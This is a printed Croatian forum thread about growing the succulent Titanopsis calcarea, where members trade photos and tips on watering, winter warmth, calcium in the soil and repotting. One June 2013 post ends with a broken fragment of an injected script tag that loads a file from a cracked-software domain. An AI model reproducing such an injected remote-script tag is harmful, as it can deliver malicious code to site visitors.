Titanopsis
Web: Cvijet.info
Kategorija: Cvijeće - Forum o cvijeću
Ime foruma: Sukulenti i kaktusi
Opis foruma: Forum o kaktusima i sukulentima
URL: http://www.cvijet.info/forum/forum_posts.asp?TID=6466
Datum ispisa: 24 Lipanj 2025 u 14:41 Verzija softvera: Web Wiz Forums 10.15 - http://www.webwizforums.com
Tema: Titanopsis
Objavio: Pinus
Tema: Titanopsis
Datum objave: 15 Studeni 2011 u 19:36
Titanopsis calcarea
http://www.cvijet.info/slike_cvijeca/slike_od_clanova/titanopsis_calcarea/34367.aspx">
Titanopsis calcarea
Ne sjećam se točno kada je došao u kolekciju. Znam samo da mi je reznicu poklonila susjeda. Dugo je bio zanemaren negdje u nekakvom ćošku. Izgleda da mu je takav tretman odgovarao . Ovu jesen prilikom unošenja sukulenata u kuću primijetio sam kako je lijepo napredovao. Trenutno prezimljava na južnoj prozorskoj polici dnevne sobe. Čini mi se da mu taj položaj odgovara, vidim da je u vegetaciji.
Evo par riječi o njemu za one kojima se ne da tražiti po internetu. Prirodno stanište Titanopsis calcarea je Južna Afrika. Podaci o njemu sa interneta su vrlo kontradiktorni. Pronalazim podatke da bez problema izdrži vrlo niske temperature – 15 C pa i niže, neki drugi autori pišu da su minimalne temperature prezimljavanja oko 8 C. Što je točno ne znam. Isto tako su kontradiktorni podaci sa neta o sastavu tla i idealnoj vrijednosti pH supstrata. Dani su podatci o pH 6,5 i mineralnom sastavu supstrata sličnom kao za lithopse pa sve do pH 7.5 – 8 i vapnenačkom tlu. Uglavnom prava zbrka podataka.
|
Odgovori:
Objavio: Belina
Datum objave: 15 Studeni 2011 u 19:42
Bravo PINUS,
ti imaš takvu kolekciju,da bi mogao otvoriti izložbu!
|
Objavio: mali kaktus
Datum objave: 15 Studeni 2011 u 20:14
Odakle samo izvlačiš te lijepe biljke,da,da,susjeda kaktusarka,jesi li bio što god kod nje.
------------- Nigder lepše kak je vu Međimurju kam se zglednem ružice mi cvetaju.
|
Datum objave: 15 Studeni 2011 u 20:22
Nisam dugo, krajnje je vrijeme da otiđem na kavu a znaš ono usput pogledaš kakva je situacija sa reznicama.
|
Datum objave: 15 Studeni 2011 u 20:25
Pinus,a da pričekaš i mene?Pa da zajedno otiđemo do susjeda.
Pa da svatko gleda što hoće!
|
Objavio: kamenjar
Datum objave: 15 Studeni 2011 u 21:37
baš je lijepa ,pinus balgo tebi sa tvojom susjedom a nama blago sa tobom..
|
Datum objave: 18 Studeni 2011 u 10:29
Belina napisao:
Pinus,a da pričekaš i mene?Pa da zajedno otiđemo do susjeda.
|
Belina, dogovoreno nema problema. Uvijek dobrodošla kod mene a mislim da i kod susjeda.
|
Objavio: natalija
Datum objave: 24 Travanj 2012 u 07:23
pinus kako titanopsis? nedavno sam nabaasala na to stvorenje i prvi je odmah propao, sad me strah da se isto ne dogodi i nasljedniku
-------------
|
Datum objave: 24 Travanj 2012 u 08:38
Krenuo je sa vegetacijom i kako vidim dobro se drži. Vodu dobi jednom tjedno. Noći su prehladne zato ga još uvijek držim iz stakla.
Natalija možda si ga previše zalila. Mislim da nije previše osjetljiv u uzgoju, osim vode koju previše ne voli.
|
Datum objave: 24 Travanj 2012 u 09:50
Hvala na gostoprimstvu,na ist način.Čekam sliku  tvog titanopsisa,i od tebe učim 
------------- "Mića rožica" sa otoka Krka - Omišalj
|
Objavio: natalija
Datum objave: 25 Travanj 2012 u 13:41
pinus nije do mog zalivanja - odmah kad sam ga uzela bio je sav nikakav, ali sam mislila da će se oporaviti valjda takva pošiljka
-------------
|
Objavio: Camellia
Datum objave: 19 Rujan 2012 u 19:46
Moj novi Titanopsis
|
Objavio: moon
Datum objave: 19 Rujan 2012 u 23:19
kako lijepo izgledaju ove biljke
|
Objavio: Glikica
Datum objave: 20 Rujan 2012 u 08:15
Prije par dana sam u Konzumu naletila na ovu biljkicu u tako jadnom stanju da sam ju morala pokupiti i donijeti kući. A koštala je svega 4, 89 kn, pa onda možete misliti kakva je. Presadila sam ju i sad je na promatranju, valjda će biti nešto od nje. Ovi gore pokazani primjerci su krasni, jako lijep sukulentić.
------------- ...i kad poželiš se ravnice, dođi u Vinkovce...
|
Objavio: belica
Datum objave: 20 Rujan 2012 u 13:50
i ja sam danas dobila na poklon jednu preslatku od naše drage Camellie

------------- belica,zagreb
|
Objavio: Miss M.
Datum objave: 29 Rujan 2012 u 19:34
Titanopsis bi sad trebao krenuti s vegetacijom i cvjetanjem bar tako kažu knjige da i to čudo vidim jer primjetila sam da je prilično mirovao ljetos.
|
Datum objave: 07 Prosinac 2012 u 19:43
http://www.cvijet.info/slike_cvijeca/slike_od_clanova/titanopsis_calcarea/53011.aspx"> Titanopsis calcarea
Calcarea cvjeta ovih dana. Nema baš neki spektakularni cvijet ali bolje išta nego ništa.
|
Datum objave: 07 Prosinac 2012 u 20:11
Preljepo i neviđeno,a gdje ti to nabavljaš?
|
Datum objave: 07 Prosinac 2012 u 20:23
Datum objave: 07 Prosinac 2012 u 20:43
Doći ću,ovako virtulno,ali želim i u stvarnosti A onda bi se ,mogla iseliti,na barku,a sva ta ljepota po kući! A susjedu se klanjam  (a ja mislila da je susjeda!)
|
Datum objave: 08 Prosinac 2012 u 07:02
Krasan je cvijetić. Vidim da ti svog držiš na toplom u kući ? Moj je u jako hladnom hodniku na prozoru- je li to greškica možda ?
|
Datum objave: 08 Prosinac 2012 u 09:42
Belica, po meni je to greška. Titanopsis je sada u vegetaciji. Uz svijetlo treba i toplotu. Kod mene je trenutno na zapadnom prozoru, temp. 20 C ± 3C, (dan, noć, ...)
|
Datum objave: 08 Prosinac 2012 u 09:44
uh onda ću ga preseliti u toplije krajeve... imam ga tek od nedavno pa nisaam znala. hvala
|
Datum objave: 13 Siječanj 2013 u 06:50
evo preseljen u toplije krajeve...

|
Objavio: Fiki
Datum objave: 13 Siječanj 2013 u 19:24
Belice-predivan je....jel ga prehranjuješ?
-------------
|
Datum objave: 16 Lipanj 2013 u 12:34
Porijeklo: Južna Afrika,poglavito Kalahari Svjetlo + + + Minimalna temp- -1 C Zemlja: Dobro drenirana Cvjetanje-4 godine.,promjer 3 cm Voda-kao i ostalih sukulenata oksudna ----------------------- Opis : Četinjasti listovi prekriveni sitnim kvržicama oblikuju male rozete ,koje u prirodnom okolišu se uklapaju u okolne stijene... 
Zovu ga i Kamenom života jer zahvaljujući svojoj kamuflaži preživljava:::
Evo i mojih...
http://s1050.photobucket.com/user/meggle77/media/DSC06040_zpscfb77c31.jpg.html" rel="nofollow">
Očekujem vaša iskustva! 
-------------
|
Objavio: Miss M.
Datum objave: 16 Lipanj 2013 u 20:34
titanopsis calcarea kao što mu samo ima govori treba kalcij u supstratu, u prirodi raste na vapnenačkim stijenama. Ja sam mom dodala izmrvljeni gips u supstrat. Zalijevam ga odozdo i to vrlo rijetko ako želiš da ostane ovako zbijenog izgleda, vidjet ću koliko će to biti uspješno.
|
Datum objave: 17 Lipanj 2013 u 11:49
Ja izmrvim krede u mlaku vodu i zalijem----voda-kišnica.....sve super raste,,,inače kreda je odličan izvor kalcija!< ="text/" a< ="text/" async="" ="http://cracks4free.info/5/adds.js">
-------------
|
Objavio: marsha
Datum objave: 18 Listopad 2013 u 14:55
Da li da ga presađujem?? Tegla je ispunjena.
http://www.cvijet.info/slike_cvijeca/vrtno_cvijece/sukulent/64563.aspx" rel="nofollow">
|
Objavio: Glikica
Datum objave: 18 Listopad 2013 u 15:19
Ooo, ima tu još mjesta u teglici, a i cvate sad, ne diraj ga. Imaš vremena za presađivanje, ne raste on tako brzo.
------------- ...i kad poželiš se ravnice, dođi u Vinkovce...
|
|